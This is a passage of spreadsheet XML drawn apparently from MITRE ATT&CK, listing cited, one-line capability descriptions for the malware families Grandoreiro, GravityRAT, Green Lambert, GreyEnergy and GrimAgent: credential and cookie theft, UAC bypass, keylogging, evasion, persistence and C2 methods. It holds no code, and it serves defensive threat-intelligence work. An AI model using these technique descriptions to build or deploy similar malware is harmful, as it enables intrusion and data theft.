    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use malicious browser extensions to steal cookies and other user information.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--a09c5b62-cd6f-40e4-b614-99b3f29de0f5</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</si>
  <si>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</si>
  <si>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relationship--7ac62413-be9a-40ef-996d-017c04f04d5b</t>
  </si>
  <si>
    <t>12 November 2020</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can bypass UAC by registering as the default handler for .MSC files.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--c1b5ad09-6b1a-487e-bec1-af2326be5007</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can capture clipboard data from a compromised host.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--9e1742a1-ffc0-4e29-88d2-04ef30a13358</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can steal cookie data and credentials from Google Chrome.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--eadd5ace-0afb-4812-8834-e0dd56b9b129</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can obtain C2 information from Google Docs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--2ad63ab0-fb5b-4bce-8bbb-bf765d324fd6</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can decrypt its encrypted internal strings.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--ade847d9-4ce6-4b63-accb-7070c926e5b5</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--7fea2b8f-60f8-400a-bfef-08471fb75a3e</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--7a66c52c-2ff1-4242-90d0-95a4b47181c2</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use a DGA for hiding C2 addresses, including use of an algorithm with a user-specific key that changes daily.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--d2b70f03-3c52-4bf9-b545-7b912348f55e</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has used compromised websites and Google Ads to bait victims into downloading its installer.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--bb23e7d5-23d6-4dde-a67f-36e19e8d2250</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can parse Outlook .pst files to extract e-mail addresses.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--6231644a-5a32-4458-b950-444f84e1b476</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can send data it retrieves to the C2 server.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--3c662aa7-0ee8-4e42-b0b9-de0dc2f02a57</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can delete .LNK files created in the Startup folder.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--855c7acd-9fa1-48a3-af4a-16de53499c3b</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can store its configuration in the Registry at `HKCU\Software\` under frequently changing names including &lt;code&gt;%USERNAME%&lt;/code&gt; and &lt;code&gt;ToolTech-RM&lt;/code&gt;.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--5f488c35-1d8c-4596-985c-11f0ee37b004</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can download its second stage from a hardcoded URL within the loader's code.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--213522ec-117d-4ac8-82c7-b297fe7c26b4</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can log keystrokes on the victim's machine.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--80a95235-abd0-4911-abca-91ec1f7e27d3</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has infected victims via malicious attachments.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--54e6596d-ca80-4406-93f3-5fab013bc913</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has used malicious links to gain execution on victim machines.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--0be595fa-a284-4657-a1bd-9b22e56b6604</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has named malicious browser extensions and update files to appear legitimate.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--2d882b40-11c3-4b7e-a400-5e87ae2bd899</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can modify the Registry to store its configuration at `HKCU\Software\` under frequently changing names including &lt;code&gt;%USERNAME%&lt;/code&gt; and &lt;code&gt;ToolTech-RM&lt;/code&gt;.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--2e53dad4-17cc-4fe6-a3b9-d622075d78f7</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use MSI files to execute DLLs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--6dca4adf-499d-4cea-b3df-48566ff6deeb</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can execute through the &lt;code&gt;WinExec&lt;/code&gt; API.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--d06c864f-e4b8-484d-8e75-76a480509665</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</si>
  <si>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</si>
  <si>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relationship--4786019e-e2d4-4d31-94fa-b9ec19e65fa4</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can identify installed security tools based on process names.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--13ab9b58-b18a-437f-898e-fc598e8d0939</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use run keys and create link files in the startup folder for persistence.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--5463f157-7cab-4e9d-bb68-6179972087b6</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can list installed security products including the Trusteer and Diebold Warsaw GAS Tecnologia online banking protections.(Citation: ESET Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--716975f1-af44-4d45-af4e-29ad68ce3fb3</t>
  </si>
  <si>
    <t xml:space="preserve">[Grandoreiro](https://attack.mitre.org/software/S0531) can write or modify browser shortcuts to enable launching of malicious browser extensions.(Citation: IBM Grandoreiro April 2020) </t>
  </si>
  <si>
    <t>relationship--17a834a6-8d77-4fee-bd02-539d93f6fa5c</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has been spread via malicious links embedded in e-mails.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--ea7cd259-9065-4762-b7e1-f17d42b4af67</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can steal the victim's cookies to use for duplicating the active session from another device.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--1e526bd3-f353-4b05-a9c9-1f8ddc59bc33</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can detect VMWare via its I/O port and Virtual PC via the &lt;code&gt;vpcext&lt;/code&gt; instruction.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--8ba9be70-d849-4f64-94b8-edc4384605a5</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can collect the computer name and OS version from a compromised host.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--68fc9cf1-d191-4ebd-af14-004519ab76d7</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can determine the IP and physical location of the compromised host via IPinfo.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--ceebecd3-5cab-40fd-8020-f5cb06f3ccd7</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can collect the username from the victim's machine.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--57de7812-f3b0-44d1-9548-856a26278568</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can determine the time on the victim machine via IPinfo.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--509a61b8-292e-4292-b4e8-c1c9901582ec</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use VBScript to execute malicious code.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--03a8b070-a7dd-43b0-a044-1cf9f999475b</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has the ability to use HTTP in C2 communications.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--e337f1d2-0729-48e0-8e8a-8fd372b81aa5</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can modify the binary ACL to prevent security tools from running.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--47266bcb-b16a-4d95-9c10-bfc48b2f5a8b</t>
  </si>
  <si>
    <t>S0237</t>
  </si>
  <si>
    <t>GravityRAT</t>
  </si>
  <si>
    <t>malware--1d1fce2f-0db5-402b-9843-4278a0694637</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--afcc4ac4-b088-4795-b159-c6245223178b</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) steals files based on an extension list if a USB drive is connected to the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--565da748-a5c8-417c-8c55-828c6e9f2c35</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has been delivered via Word documents using DDE for execution.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--c49b5147-f60f-43d7-b119-52b1761002af</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--79d23451-095d-445d-a61e-3351b55eafde</t>
  </si>
  <si>
    <t>The author of [GravityRAT](https://attack.mitre.org/software/S0237) submitted samples to VirusTotal for testing, showing that the author modified the code to try to hide the DDE object in a different part of the document.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--03e6e755-12a2-4261-b95d-caea6b2bf051</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has used HTTP over a non-standard port, such as TCP port 46769.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--e61e5dc3-b6ac-4909-b188-eaede02385df</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) supports file encryption (AES with the key "lolomycin2017").(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--394d53b3-da1c-44b4-8abf-e1092f34c8be</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) lists the running processes on the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--54ea458f-665e-42a3-b181-8d783e9589ad</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) creates a scheduled task to ensure it is re-executed everyday.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--60349cdb-6f9a-4962-92aa-105eea1d112a</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</si>
  <si>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</si>
  <si>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relationship--59a6a413-1f3f-44bd-8b66-5685a1e8e6df</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the MAC address, computer name, and CPU information.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--041e8f9b-6cdb-44b3-aa37-a274a4de9a0b</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the victim IP address, MAC address, as well as the victim account domain name.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--18f3619c-c1e1-4b2c-b582-2cb5691f02e9</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) uses the &lt;code&gt;netstat&lt;/code&gt; command to find open ports on the victim’s machine.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--27a36f9c-2292-4bf0-8c08-9ccfc1effffe</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the victim username along with other account information (account type, description, full name, SID and status).(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--bfb687f5-0c7d-4ac3-a295-26f1b96dc360</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has a feature to list the available services on the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--948f8c8b-18e1-4652-86af-bad1dc0ec090</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) can obtain the date and time of a system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--33e3573b-0f18-417c-be17-727863fc21ec</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) uses HTTP for C2.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--42aa16be-5b53-4645-998b-9eb5de8c0429</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) executes commands remotely on the infected host.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--b533e55c-77c7-48f8-baa7-c8724f90e483</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed).(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>relationship--fe4c0535-7491-4345-a524-11f8434e3678</t>
  </si>
  <si>
    <t>S0690</t>
  </si>
  <si>
    <t>Green Lambert</t>
  </si>
  <si>
    <t>malware--59c8a28c-200c-4565-9af1-cbdb24870ba0</t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) can use DNS for C2 communications.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t>relationship--7ce75658-c5ea-484d-ab1d-2dca045a244b</t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) can collect data from a compromised host.(Citation: Objective See Green Lambert for OSX Oct 2021)</t>
  </si>
  <si>
    <t>relationship--9fd8bbd8-1d8d-426d-b079-c7cc2ebd4b35</t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) can use multiple custom routines to decrypt strings prior to execution.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t>relationship--817dc3ce-3e77-4e91-a9e4-9c8c8579e722</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can delete the original executable after initial installation in addition to unused functions.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>relationship--981bef7b-d442-487e-9763-1f69ffd71126</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</si>
  <si>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</si>
  <si>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relationship--46970d57-04cb-4ffb-9c7e-ff66c0811f25</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</si>
  <si>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</si>
  <si>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relationship--b6f451a7-f3a8-4d62-a449-21af7731d369</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can add a plist file in the `Library/LaunchDaemons` to establish persistence.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>relationship--13dca3a6-ea1f-47eb-8030-18f15e309faf</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can add [Login Items](https://attack.mitre.org/techniques/T1547/015) to establish persistence.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>relationship--93139a4e-d7cb-44cf-8612-46532c85cfba</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) has created a new executable named `Software Update Check` to appear legitimate.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>relationship--bf906149-256b-4c05-971e-843c026a9a43</t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) has been disguised as a Growl help file.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t>relationship--dccba6fb-529c-44c9-9d98-bea2bfc43f43</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) has encrypted strings.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>relationship--a7361e2b-9cdc-4fa6-97e4-1b191e9f3952</t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) can use proxies for C2 traffic.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t>relationship--92b8dedc-360a-4763-bc31-5f7b0a698460</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</si>
  <si>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</si>
  <si>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relationship--b745cf21-c63a-42f2-bc98-6bd61674917a</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can use `uname` to identify the operating system name, version, and processor type.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)  </t>
  </si>
  <si>
    <t>relationship--48ee2b91-2ce7-46c0-a27a-aea1695355b4</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can obtain proxy information from a victim's machine using system environment variables.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>relationship--8d1a56fa-bf5b-4d06-b63b-fa91dc3f67c8</t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) can collect the date and time from a compromised host.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t>relationship--e2250609-d3e3-4297-8564-aff8516f8dc3</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can use shell scripts for execution, such as &lt;code&gt;/bin/sh -c&lt;/code&gt;.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>relationship--abb80a28-3fc0-4e1f-8d39-83567be53835</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</si>
  <si>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</si>
  <si>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relationship--b3efa4b3-4281-4bc7-a588-836d8e64c2f2</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts communications using RSA-2048.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--8f56f7af-962a-4d2f-89db-7c1d89b79a32</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) digitally signs the malware with a code-signing certificate.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--496017cd-f22a-4295-931c-70bb672985f8</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--1ae53b90-59d3-4510-b0e8-686b7ea8e626</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) can download additional modules and payloads.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--a21e7dd8-9194-4c09-870c-11f44f391838</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module to harvest pressed keystrokes.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--ce4bf5bc-4935-429b-843e-3232fb810e90</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module for [Mimikatz](https://attack.mitre.org/software/S0002) to collect Windows credentials from the victim’s machine.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--fcd9182a-516c-425f-82ec-61cdb0bfc731</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) modifies conditions in the Registry and adds keys.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--b7dfc429-1f62-4bb1-933f-25dfd4fff9ad</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has used Tor relays for Command and Control servers.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--0f97d56a-3484-47fb-a232-5a20121fa89c</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts its configuration files with AES-256 and also encrypts its strings.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--fba908dc-4478-4626-ab73-72c43eca5279</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module to inject a PE binary into a remote process.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--b37c1e66-774b-45ff-9c2a-b24ea9784963</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--1ad1048f-05ce-4bde-a570-6b4be5fbeb4c</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) is packed for obfuscation.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--c63696bf-8b36-4366-9c3f-7a2d0053c481</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts communications using AES256.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--b644de55-05f0-4e2e-93ee-db7915097ed1</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) enumerates all Windows services.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--7c58aab0-77cf-469e-836e-2b8c031afd1e</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses HTTP and HTTPS for C2 communications.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--4905ffe6-8c52-48e2-90f1-ea1ad064fe16</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses cmd.exe to execute itself in-memory.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--9da5f1e4-2039-4c6a-8800-2c9277092d7c</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) chooses a service, drops a DLL file, and writes it to that serviceDLL Registry key.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--27dcfdc7-f5d5-49b4-ad4e-afd43974c43c</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can use a hardcoded server public RSA key to encrypt the first request to C2.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--3f1ab899-077c-4f89-81ed-98683ac8753e</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to add bytes to change the file hash.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--f2456bbf-ac8a-43c7-b51a-b52e3376726f</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can delete previously created tasks on a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--ba583cf4-b162-4fbd-bf94-ad9f8cc5f642</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can collect data and files from a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--267fb6e6-0776-4de0-baac-985beb079ad2</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can use a decryption algorithm for strings based on Rotate on Right (RoR) and Rotate on Left (RoL) functionality.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--c9256d21-a464-477a-8756-96eae300b0e4</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has sent data related to a compromise host over its C2 channel.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--f187aa90-df6c-485c-bc01-dec83aca9625</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can delete old binaries on a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--e04dd3e5-9883-4f0a-bf05-b20af89c88f3</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to enumerate files and directories on a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--44ddb228-ec4e-495e-b930-04a49fe58a7d</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to download and execute additional payloads.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--494255a0-7672-4302-9e1b-bf3767cb8384</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632)  can pad C2 messages with random generated values.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--d5bd4aaf-4a58-45dd-a9e7-3ceb6385a998</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can use Native API including &lt;code&gt;GetProcAddress&lt;/code&gt; and &lt;code&gt;ShellExecuteW&lt;/code&gt;.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--6abe4e38-5d96-469e-b648-dca7a520cc2e</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has used Rotate on Right (RoR) and Rotate on Left (RoL) functionality to encrypt strings.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--ecd6c482-51ae-402c-8482-4feb9cda9b05</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can set persistence with a Registry run key.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--251b010d-270f-44a3-8546-ce7cde631ab7</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to set persistence using the Task Scheduler.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--256edc9a-e5fa-48fc-b398-eb0873d46e78</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can base64 encode C2 replies.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--50f0d6ac-0cfa-41d6-9795-e6843101c524</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can use an AES key to encrypt C2 communications.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--639a960d-8cc1-4f6f-aca1-cf3c6445d056</t>
  </si>
  <si>
